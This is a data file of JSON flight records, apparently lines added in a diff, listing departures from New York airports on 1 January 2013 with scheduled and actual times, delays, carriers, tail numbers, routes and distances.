+{"year":2013,"month":1,"day":1,"dep_time":1631,"sched_dep_time":1617,"dep_delay":14,"arr_time":1740,"sched_arr_time":1727,"arr_delay":13,"carrier":"EV","flight":4299,"tailnum":"N14972","origin":"EWR","dest":"DCA","air_time":48,"distance":199,"hour":16,"minute":17,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1631,"sched_dep_time":1635,"dep_delay":-4,"arr_time":1956,"sched_arr_time":2000,"arr_delay":-4,"carrier":"US","flight":656,"tailnum":"N649AW","origin":"EWR","dest":"PHX","air_time":309,"distance":2133,"hour":16,"minute":35,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1631,"sched_dep_time":1630,"dep_delay":1,"arr_time":1935,"sched_arr_time":1950,"arr_delay":-15,"carrier":"UA","flight":1726,"tailnum":"N75425","origin":"EWR","dest":"SAN","air_time":346,"distance":2425,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1632,"sched_dep_time":1635,"dep_delay":-3,"arr_time":1903,"sched_arr_time":1840,"arr_delay":23,"carrier":"WN","flight":190,"tailnum":"N258WN","origin":"LGA","dest":"STL","air_time":181,"distance":888,"hour":16,"minute":35,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1632,"sched_dep_time":1635,"dep_delay":-3,"arr_time":1824,"sched_arr_time":1810,"arr_delay":14,"carrier":"MQ","flight":3695,"tailnum":"N507MQ","origin":"EWR","dest":"ORD","air_time":139,"distance":719,"hour":16,"minute":35,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1634,"sched_dep_time":1626,"dep_delay":8,"arr_time":1913,"sched_arr_time":1852,"arr_delay":21,"carrier":"UA","flight":69,"tailnum":"N27213","origin":"EWR","dest":"DEN","air_time":247,"distance":1605,"hour":16,"minute":26,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1635,"sched_dep_time":1630,"dep_delay":5,"arr_time":1830,"sched_arr_time":1810,"arr_delay":20,"carrier":"UA","flight":162,"tailnum":"N16701","origin":"EWR","dest":"CLE","air_time":84,"distance":404,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1636,"sched_dep_time":1639,"dep_delay":-3,"arr_time":1747,"sched_arr_time":1755,"arr_delay":-8,"carrier":"B6","flight":1176,"tailnum":"N190JB","origin":"EWR","dest":"BOS","air_time":42,"distance":200,"hour":16,"minute":39,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1637,"sched_dep_time":1545,"dep_delay":52,"arr_time":1858,"sched_arr_time":1819,"arr_delay":39,"carrier":"9E","flight":3321,"tailnum":"N604LR","origin":"JFK","dest":"MSP","air_time":173,"distance":1029,"hour":15,"minute":45,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1639,"sched_dep_time":1517,"dep_delay":82,"arr_time":1815,"sched_arr_time":1639,"arr_delay":96,"carrier":"EV","flight":4580,"tailnum":"N16561","origin":"EWR","dest":"MKE","air_time":140,"distance":725,"hour":15,"minute":17,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1640,"sched_dep_time":1640,"dep_delay":0,"arr_time":1859,"sched_arr_time":1850,"arr_delay":9,"carrier":"MQ","flight":4540,"tailnum":"N723MQ","origin":"LGA","dest":"DTW","air_time":106,"distance":502,"hour":16,"minute":40,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1641,"sched_dep_time":1650,"dep_delay":-9,"arr_time":1746,"sched_arr_time":1820,"arr_delay":-34,"carrier":"AA","flight":1790,"tailnum":"N3BYAA","origin":"JFK","dest":"BOS","air_time":41,"distance":187,"hour":16,"minute":50,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1642,"sched_dep_time":1610,"dep_delay":32,"arr_time":1944,"sched_arr_time":1919,"arr_delay":25,"carrier":"UA","flight":1587,"tailnum":"N17229","origin":"EWR","dest":"RSW","air_time":161,"distance":1068,"hour":16,"minute":10,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1645,"sched_dep_time":1639,"dep_delay":6,"arr_time":1832,"sched_arr_time":1816,"arr_delay":16,"carrier":"EV","flight":4336,"tailnum":"N13538","origin":"EWR","dest":"GSO","air_time":89,"distance":445,"hour":16,"minute":39,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1649,"sched_dep_time":1639,"dep_delay":10,"arr_time":1937,"sched_arr_time":1911,"arr_delay":26,"carrier":"EV","flight":4705,"tailnum":"N14960","origin":"EWR","dest":"ATL","air_time":139,"distance":746,"hour":16,"minute":39,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1650,"sched_dep_time":1615,"dep_delay":35,"arr_time":2009,"sched_arr_time":1913,"arr_delay":56,"carrier":"B6","flight":985,"tailnum":"N564JB","origin":"LGA","dest":"TPA","air_time":162,"distance":1010,"hour":16,"minute":15,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1651,"sched_dep_time":1650,"dep_delay":1,"arr_time":2000,"sched_arr_time":2004,"arr_delay":-4,"carrier":"B6","flight":185,"tailnum":"N665JB","origin":"JFK","dest":"SAN","air_time":349,"distance":2446,"hour":16,"minute":50,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1652,"sched_dep_time":1640,"dep_delay":12,"arr_time":2030,"sched_arr_time":1955,"arr_delay":35,"carrier":"AA","flight":773,"tailnum":"N565AA","origin":"LGA","dest":"DFW","air_time":252,"distance":1389,"hour":16,"minute":40,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1653,"sched_dep_time":1700,"dep_delay":-7,"arr_time":2005,"sched_arr_time":2018,"arr_delay":-13,"carrier":"DL","flight":1807,"tailnum":"N980DL","origin":"LGA","dest":"FLL","air_time":158,"distance":1076,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1654,"sched_dep_time":1644,"dep_delay":10,"arr_time":1752,"sched_arr_time":1753,"arr_delay":-1,"carrier":"EV","flight":4539,"tailnum":"N27962","origin":"EWR","dest":"MHT","air_time":38,"distance":209,"hour":16,"minute":44,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1654,"sched_dep_time":1700,"dep_delay":-6,"arr_time":2020,"sched_arr_time":2034,"arr_delay":-14,"carrier":"DL","flight":706,"tailnum":"N320NB","origin":"JFK","dest":"AUS","air_time":251,"distance":1521,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1655,"sched_dep_time":1621,"dep_delay":34,"arr_time":1804,"sched_arr_time":1724,"arr_delay":40,"carrier":"EV","flight":3260,"tailnum":"N19554","origin":"EWR","dest":"ALB","air_time":36,"distance":143,"hour":16,"minute":21,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1655,"sched_dep_time":1700,"dep_delay":-5,"arr_time":1953,"sched_arr_time":1950,"arr_delay":3,"carrier":"AA","flight":575,"tailnum":"N5DRAA","origin":"JFK","dest":"EGE","air_time":280,"distance":1747,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1655,"sched_dep_time":1700,"dep_delay":-5,"arr_time":2027,"sched_arr_time":2049,"arr_delay":-22,"carrier":"DL","flight":31,"tailnum":"N713TW","origin":"JFK","dest":"SFO","air_time":357,"distance":2586,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1655,"sched_dep_time":1655,"dep_delay":0,"arr_time":2025,"sched_arr_time":2030,"arr_delay":-5,"carrier":"VX","flight":413,"tailnum":"N626VA","origin":"JFK","dest":"LAX","air_time":362,"distance":2475,"hour":16,"minute":55,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1656,"sched_dep_time":1700,"dep_delay":-4,"arr_time":1941,"sched_arr_time":1955,"arr_delay":-14,"carrier":"AA","flight":257,"tailnum":"N3CAAA","origin":"JFK","dest":"LAS","air_time":322,"distance":2248,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1657,"sched_dep_time":1650,"dep_delay":7,"arr_time":1921,"sched_arr_time":1840,"arr_delay":41,"carrier":"WN","flight":2773,"tailnum":"N462WN","origin":"EWR","dest":"STL","air_time":181,"distance":872,"hour":16,"minute":50,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1657,"sched_dep_time":1630,"dep_delay":27,"arr_time":1948,"sched_arr_time":1926,"arr_delay":22,"carrier":"UA","flight":1609,"tailnum":"N17105","origin":"EWR","dest":"MCO","air_time":148,"distance":937,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1658,"sched_dep_time":1700,"dep_delay":-2,"arr_time":1808,"sched_arr_time":1840,"arr_delay":-32,"carrier":"MQ","flight":4323,"tailnum":"N688MQ","origin":"JFK","dest":"ORF","air_time":52,"distance":290,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1701,"sched_dep_time":1710,"dep_delay":-9,"arr_time":2026,"sched_arr_time":2015,"arr_delay":11,"carrier":"AA","flight":695,"tailnum":"N3FUAA","origin":"JFK","dest":"AUS","air_time":247,"distance":1521,"hour":17,"minute":10,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1701,"sched_dep_time":1700,"dep_delay":1,"arr_time":1856,"sched_arr_time":1840,"arr_delay":16,"carrier":"UA","flight":689,"tailnum":"N418UA","origin":"LGA","dest":"ORD","air_time":144,"distance":733,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1702,"sched_dep_time":1700,"dep_delay":2,"arr_time":2044,"sched_arr_time":2028,"arr_delay":16,"carrier":"UA","flight":1259,"tailnum":"N16632","origin":"LGA","dest":"IAH","air_time":234,"distance":1416,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1705,"sched_dep_time":1705,"dep_delay":0,"arr_time":2054,"sched_arr_time":2010,"arr_delay":44,"carrier":"AA","flight":1905,"tailnum":"N4WRAA","origin":"EWR","dest":"DFW","air_time":251,"distance":1372,"hour":17,"minute":5,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1705,"sched_dep_time":1710,"dep_delay":-5,"arr_time":1924,"sched_arr_time":1915,"arr_delay":9,"carrier":"US","flight":1447,"tailnum":"N188US","origin":"LGA","dest":"CLT","air_time":110,"distance":544,"hour":17,"minute":10,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1707,"sched_dep_time":1705,"dep_delay":2,"arr_time":1928,"sched_arr_time":1940,"arr_delay":-12,"carrier":"DL","flight":2121,"tailnum":"N3730B","origin":"EWR","dest":"ATL","air_time":121,"distance":746,"hour":17,"minute":5,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1707,"sched_dep_time":1700,"dep_delay":7,"arr_time":2006,"sched_arr_time":2000,"arr_delay":6,"carrier":"UA","flight":342,"tailnum":"N543UA","origin":"EWR","dest":"LAX","air_time":334,"distance":2454,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1708,"sched_dep_time":1700,"dep_delay":8,"arr_time":2037,"sched_arr_time":2005,"arr_delay":32,"carrier":"WN","flight":1066,"tailnum":"N778SW","origin":"EWR","dest":"HOU","air_time":245,"distance":1411,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1711,"sched_dep_time":1650,"dep_delay":21,"arr_time":1820,"sched_arr_time":1806,"arr_delay":14,"carrier":"EV","flight":4194,"tailnum":"N15986","origin":"EWR","dest":"BTV","air_time":48,"distance":266,"hour":16,"minute":50,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1711,"sched_dep_time":1635,"dep_delay":36,"arr_time":1918,"sched_arr_time":1845,"arr_delay":33,"carrier":"B6","flight":1085,"tailnum":"N228JB","origin":"JFK","dest":"CLT","air_time":112,"distance":541,"hour":16,"minute":35,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1711,"sched_dep_time":1600,"dep_delay":71,"arr_time":2005,"sched_arr_time":1857,"arr_delay":68,"carrier":"B6","flight":369,"tailnum":"N579JB","origin":"LGA","dest":"PBI","air_time":149,"distance":1035,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1712,"sched_dep_time":1719,"dep_delay":-7,"arr_time":1939,"sched_arr_time":1958,"arr_delay":-19,"carrier":"UA","flight":509,"tailnum":"N569UA","origin":"LGA","dest":"DEN","air_time":241,"distance":1620,"hour":17,"minute":19,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1712,"sched_dep_time":1700,"dep_delay":12,"arr_time":2042,"sched_arr_time":2036,"arr_delay":6,"carrier":"UA","flight":635,"tailnum":"N485UA","origin":"EWR","dest":"SAT","air_time":242,"distance":1569,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1713,"sched_dep_time":1700,"dep_delay":13,"arr_time":2006,"sched_arr_time":2014,"arr_delay":-8,"carrier":"B6","flight":15,"tailnum":"N346JB","origin":"JFK","dest":"FLL","air_time":156,"distance":1069,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1714,"sched_dep_time":1720,"dep_delay":-6,"arr_time":1915,"sched_arr_time":1915,"arr_delay":0,"carrier":"AA","flight":1351,"tailnum":"N3CVAA","origin":"JFK","dest":"ORD","air_time":146,"distance":740,"hour":17,"minute":20,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1716,"sched_dep_time":1730,"dep_delay":-14,"arr_time":1947,"sched_arr_time":1953,"arr_delay":-6,"carrier":"F9","flight":511,"tailnum":"N263AV","origin":"LGA","dest":"DEN","air_time":242,"distance":1620,"hour":17,"minute":30,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1716,"sched_dep_time":1545,"dep_delay":91,"arr_time":2140,"sched_arr_time":2039,"arr_delay":61,"carrier":"B6","flight":703,"tailnum":"N651JB","origin":"JFK","dest":"SJU","air_time":183,"distance":1598,"hour":15,"minute":45,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1716,"sched_dep_time":1709,"dep_delay":7,"arr_time":1902,"sched_arr_time":1846,"arr_delay":16,"carrier":"UA","flight":1623,"tailnum":"N19130","origin":"EWR","dest":"ORD","air_time":143,"distance":719,"hour":17,"minute":9,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1717,"sched_dep_time":1720,"dep_delay":-3,"arr_time":1920,"sched_arr_time":1910,"arr_delay":10,"carrier":"AA","flight":345,"tailnum":"N539AA","origin":"LGA","dest":"ORD","air_time":141,"distance":733,"hour":17,"minute":20,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1718,"sched_dep_time":1710,"dep_delay":8,"arr_time":2154,"sched_arr_time":2201,"arr_delay":-7,"carrier":"B6","flight":699,"tailnum":"N507JB","origin":"JFK","dest":"SJU","air_time":189,"distance":1598,"hour":17,"minute":10,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1719,"sched_dep_time":1720,"dep_delay":-1,"arr_time":1908,"sched_arr_time":1905,"arr_delay":3,"carrier":"MQ","flight":4479,"tailnum":"N713MQ","origin":"LGA","dest":"RDU","air_time":80,"distance":431,"hour":17,"minute":20,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1720,"sched_dep_time":1725,"dep_delay":-5,"arr_time":2121,"sched_arr_time":2105,"arr_delay":16,"carrier":"DL","flight":513,"tailnum":"N723TW","origin":"JFK","dest":"LAX","air_time":363,"distance":2475,"hour":17,"minute":25,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1725,"sched_dep_time":1730,"dep_delay":-5,"arr_time":1929,"sched_arr_time":1926,"arr_delay":3,"carrier":"US","flight":449,"tailnum":"N680AW","origin":"EWR","dest":"CLT","air_time":104,"distance":529,"hour":17,"minute":30,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1725,"sched_dep_time":1720,"dep_delay":5,"arr_time":2045,"sched_arr_time":2021,"arr_delay":24,"carrier":"UA","flight":1712,"tailnum":"N17122","origin":"EWR","dest":"IAH","air_time":235,"distance":1400,"hour":17,"minute":20,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1726,"sched_dep_time":1730,"dep_delay":-4,"arr_time":2054,"sched_arr_time":2050,"arr_delay":4,"carrier":"AA","flight":543,"tailnum":"N386AA","origin":"JFK","dest":"MIA","air_time":157,"distance":1089,"hour":17,"minute":30,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1726,"sched_dep_time":1729,"dep_delay":-3,"arr_time":2042,"sched_arr_time":2100,"arr_delay":-18,"carrier":"UA","flight":512,"tailnum":"N557UA","origin":"JFK","dest":"SFO","air_time":347,"distance":2586,"hour":17,"minute":29,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1727,"sched_dep_time":1725,"dep_delay":2,"arr_time":2043,"sched_arr_time":2040,"arr_delay":3,"carrier":"AA","flight":145,"tailnum":"N377AA","origin":"JFK","dest":"SAN","air_time":357,"distance":2446,"hour":17,"minute":25,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1728,"sched_dep_time":1600,"dep_delay":88,"arr_time":2004,"sched_arr_time":1817,"arr_delay":107,"carrier":"EV","flight":3843,"tailnum":"N13903","origin":"EWR","dest":"SDF","air_time":135,"distance":642,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1729,"sched_dep_time":1718,"dep_delay":11,"arr_time":2052,"sched_arr_time":2055,"arr_delay":-3,"carrier":"UA","flight":1284,"tailnum":"N14120","origin":"EWR","dest":"SFO","air_time":360,"distance":2565,"hour":17,"minute":18,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1730,"sched_dep_time":1730,"dep_delay":0,"arr_time":2013,"sched_arr_time":1959,"arr_delay":14,"carrier":"FL","flight":623,"tailnum":"N967AT","origin":"LGA","dest":"ATL","air_time":128,"distance":762,"hour":17,"minute":30,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1730,"sched_dep_time":1730,"dep_delay":0,"arr_time":2126,"sched_arr_time":2110,"arr_delay":16,"carrier":"B6","flight":179,"tailnum":"N618JB","origin":"JFK","dest":"PHX","air_time":323,"distance":2153,"hour":17,"minute":30,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1730,"sched_dep_time":1729,"dep_delay":1,"arr_time":2039,"sched_arr_time":2058,"arr_delay":-19,"carrier":"UA","flight":1715,"tailnum":"N77296","origin":"EWR","dest":"SEA","air_time":344,"distance":2402,"hour":17,"minute":29,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1732,"sched_dep_time":1630,"dep_delay":62,"arr_time":2028,"sched_arr_time":1825,"arr_delay":123,"carrier":"EV","flight":4092,"tailnum":"N16911","origin":"EWR","dest":"DAY","air_time":119,"distance":533,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1736,"sched_dep_time":1640,"dep_delay":56,"arr_time":2047,"sched_arr_time":2001,"arr_delay":46,"carrier":"B6","flight":139,"tailnum":"N329JB","origin":"JFK","dest":"RSW","air_time":176,"distance":1074,"hour":16,"minute":40,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1738,"sched_dep_time":1745,"dep_delay":-7,"arr_time":2030,"sched_arr_time":2042,"arr_delay":-12,"carrier":"B6","flight":547,"tailnum":"N508JB","origin":"EWR","dest":"PBI","air_time":147,"distance":1023,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1739,"sched_dep_time":1745,"dep_delay":-6,"arr_time":1956,"sched_arr_time":1953,"arr_delay":3,"carrier":"DL","flight":2331,"tailnum":"N965DL","origin":"LGA","dest":"DTW","air_time":93,"distance":502,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1739,"sched_dep_time":1740,"dep_delay":-1,"arr_time":2051,"sched_arr_time":2112,"arr_delay":-21,"carrier":"DL","flight":1339,"tailnum":"N3761R","origin":"JFK","dest":"PDX","air_time":341,"distance":2454,"hour":17,"minute":40,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1740,"sched_dep_time":1630,"dep_delay":70,"arr_time":2102,"sched_arr_time":1954,"arr_delay":68,"carrier":"DL","flight":2139,"tailnum":"N369NW","origin":"LGA","dest":"MIA","air_time":167,"distance":1096,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1740,"sched_dep_time":1745,"dep_delay":-5,"arr_time":2158,"sched_arr_time":2020,"carrier":"MQ","flight":4413,"tailnum":"N739MQ","origin":"LGA","dest":"XNA","distance":1147,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1742,"sched_dep_time":1746,"dep_delay":-4,"arr_time":2028,"sched_arr_time":2052,"arr_delay":-24,"carrier":"DL","flight":1585,"tailnum":"N933DL","origin":"LGA","dest":"MCO","air_time":145,"distance":950,"hour":17,"minute":46,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1743,"sched_dep_time":1615,"dep_delay":88,"arr_time":1925,"sched_arr_time":1819,"arr_delay":66,"carrier":"9E","flight":3651,"tailnum":"N8515F","origin":"JFK","dest":"RDU","air_time":72,"distance":427,"hour":16,"minute":15,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1744,"sched_dep_time":1750,"dep_delay":-6,"arr_time":2043,"sched_arr_time":2045,"arr_delay":-2,"carrier":"B6","flight":527,"tailnum":"N661JB","origin":"EWR","dest":"MCO","air_time":137,"distance":937,"hour":17,"minute":50,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1744,"sched_dep_time":1720,"dep_delay":24,"arr_time":2052,"sched_arr_time":2025,"arr_delay":27,"carrier":"B6","flight":163,"tailnum":"N658JB","origin":"JFK","dest":"TPA","air_time":160,"distance":1005,"hour":17,"minute":20,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1744,"sched_dep_time":1745,"dep_delay":-1,"arr_time":2055,"sched_arr_time":2059,"arr_delay":-4,"carrier":"DL","flight":1935,"tailnum":"N900DE","origin":"LGA","dest":"TPA","air_time":160,"distance":1010,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1744,"sched_dep_time":1745,"dep_delay":-1,"arr_time":1925,"sched_arr_time":1915,"arr_delay":10,"carrier":"WN","flight":128,"tailnum":"N8324A","origin":"LGA","dest":"MDW","air_time":137,"distance":725,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1745,"sched_dep_time":1749,"dep_delay":-4,"arr_time":1943,"sched_arr_time":1909,"arr_delay":34,"carrier":"B6","flight":1307,"tailnum":"N216JB","origin":"JFK","dest":"IAD","air_time":65,"distance":228,"hour":17,"minute":49,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1750,"sched_dep_time":1750,"dep_delay":0,"arr_time":2109,"sched_arr_time":2115,"arr_delay":-6,"carrier":"UA","flight":535,"tailnum":"N525UA","origin":"JFK","dest":"LAX","air_time":345,"distance":2475,"hour":17,"minute":50,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1751,"sched_dep_time":1745,"dep_delay":6,"arr_time":2044,"sched_arr_time":2040,"arr_delay":4,"carrier":"B6","flight":9,"tailnum":"N527JB","origin":"JFK","dest":"MCO","air_time":141,"distance":944,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1751,"sched_dep_time":1745,"dep_delay":6,"arr_time":2015,"sched_arr_time":1910,"arr_delay":65,"carrier":"WN","flight":3384,"tailnum":"N764SW","origin":"EWR","dest":"MDW","air_time":148,"distance":711,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1753,"sched_dep_time":1745,"dep_delay":8,"arr_time":2058,"sched_arr_time":2037,"arr_delay":21,"carrier":"B6","flight":391,"tailnum":"N630JB","origin":"LGA","dest":"MCO","air_time":144,"distance":950,"hour":17,"minute":45,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1756,"sched_dep_time":1725,"dep_delay":31,"arr_time":2036,"sched_arr_time":2019,"arr_delay":17,"carrier":"UA","flight":376,"tailnum":"N523UA","origin":"EWR","dest":"MCO","air_time":140,"distance":937,"hour":17,"minute":25,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1757,"sched_dep_time":1703,"dep_delay":54,"arr_time":1904,"sched_arr_time":1813,"arr_delay":51,"carrier":"EV","flight":4373,"tailnum":"N14998","origin":"EWR","dest":"DCA","air_time":45,"distance":199,"hour":17,"minute":3,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1757,"sched_dep_time":1759,"dep_delay":-2,"arr_time":2027,"sched_arr_time":2042,"arr_delay":-15,"carrier":"DL","flight":1047,"tailnum":"N643DL","origin":"LGA","dest":"ATL","air_time":125,"distance":762,"hour":17,"minute":59,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1758,"sched_dep_time":1800,"dep_delay":-2,"arr_time":1905,"sched_arr_time":1917,"arr_delay":-12,"carrier":"B6","flight":1016,"tailnum":"N304JB","origin":"JFK","dest":"BOS","air_time":36,"distance":187,"hour":18,"minute":0,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1758,"sched_dep_time":1800,"dep_delay":-2,"arr_time":2105,"sched_arr_time":2110,"arr_delay":-5,"carrier":"B6","flight":989,"tailnum":"N663JB","origin":"JFK","dest":"FLL","air_time":152,"distance":1069,"hour":18,"minute":0,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1758,"sched_dep_time":1749,"dep_delay":9,"arr_time":2020,"sched_arr_time":1943,"arr_delay":37,"carrier":"UA","flight":1676,"tailnum":"N37274","origin":"EWR","dest":"ORD","air_time":135,"distance":719,"hour":17,"minute":49,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1759,"sched_dep_time":1759,"dep_delay":0,"arr_time":1957,"sched_arr_time":1949,"arr_delay":8,"carrier":"EV","flight":4581,"tailnum":"N13566","origin":"EWR","dest":"CMH","air_time":95,"distance":463,"hour":17,"minute":59,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1800,"sched_dep_time":1800,"dep_delay":0,"arr_time":1945,"sched_arr_time":1951,"arr_delay":-6,"carrier":"B6","flight":1111,"tailnum":"N294JB","origin":"JFK","dest":"RDU","air_time":78,"distance":427,"hour":18,"minute":0,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1800,"sched_dep_time":1800,"dep_delay":0,"arr_time":1951,"sched_arr_time":1954,"arr_delay":-3,"carrier":"UA","flight":1053,"tailnum":"N16703","origin":"EWR","dest":"CLE","air_time":83,"distance":404,"hour":18,"minute":0,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1802,"sched_dep_time":1805,"dep_delay":-3,"arr_time":1930,"sched_arr_time":1944,"arr_delay":-14,"carrier":"DL","flight":1006,"tailnum":"N359NB","origin":"LGA","dest":"BUF","air_time":61,"distance":292,"hour":18,"minute":5,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1802,"sched_dep_time":1801,"dep_delay":1,"arr_time":2125,"sched_arr_time":2137,"arr_delay":-12,"carrier":"UA","flight":1165,"tailnum":"N75429","origin":"EWR","dest":"LAX","air_time":340,"distance":2454,"hour":18,"minute":1,"time_hour":"2013-01-01 18:00:00"} 